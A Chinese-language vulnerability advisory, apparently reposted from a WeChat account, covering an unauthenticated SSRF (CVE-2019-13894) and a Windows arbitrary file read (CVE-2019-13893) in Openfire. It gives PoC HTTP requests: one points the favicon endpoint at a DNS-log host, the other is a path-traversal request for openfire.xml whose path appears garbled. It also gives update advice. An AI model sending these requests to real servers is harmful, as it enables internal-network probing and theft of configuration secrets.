微慑信息网

Openfire 未授权SSRF漏洞&任意文件读取

Openfire 未授权SSRF漏洞&任意文件读取

 

0x01 简介

Openfire(以前称为Wildfire和Jive Messenger)是IgniteRealtime支持的Jabber服务器。它是一个跨平台的Java应用程序,将其自身定位为中型企业控制内部通信并简化即时消息传递的平台。

 

0x02 SSRF CVE-2019-13894

此漏洞允许未经身份验证的攻击者向内部网络发送任意HTTP GET请求,并从目标Web服务获取完整的输出。

PoC:

GET /getFavicon?host=jd7uyj.dnslog.cn HTTP/1.1

Openfire 未授权SSRF漏洞&任意文件读取

Openfire 未授权SSRF漏洞&任意文件读取

推荐两个在线测试监控平台

http://ceye.io/http://www.dnslog.cn/

 

0x03 CVE-2019-13893 任意文件读取

该漏洞只影响windows下安装openfire的用户。

PoC:

GET /plugins/search/......confopenfire.xml HTTP/1.1Host: localhost:9090Cookie: JSESSIONID=node01aaib5x4g4p781q3i2m2tm74u91.node0;

Openfire 未授权SSRF漏洞&任意文件读取

(此漏洞小编没有搭建环境,只复现了SSRF,图片来源于某大佬)

 

0x04 修复建议

如果您有Openfire服务器,请确保已将其更新到4.4.3或更高版本。

 

0x05 参考链接

 

https://www.seebug.org/vuldb/ssvid-98328https://swarm.ptsecurity.com/openfire-admin-console/https://www.cnblogs.com/potatsoSec/p/13437713.html

 

 

原文始发于微信公众号(渗透Xiao白帽):Openfire 未授权SSRF漏洞&任意文件读取

赞(0) 打赏
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » Openfire 未授权SSRF漏洞&任意文件读取

评论 抢沙发

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

访问我们联系我们

觉得文章有用就打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册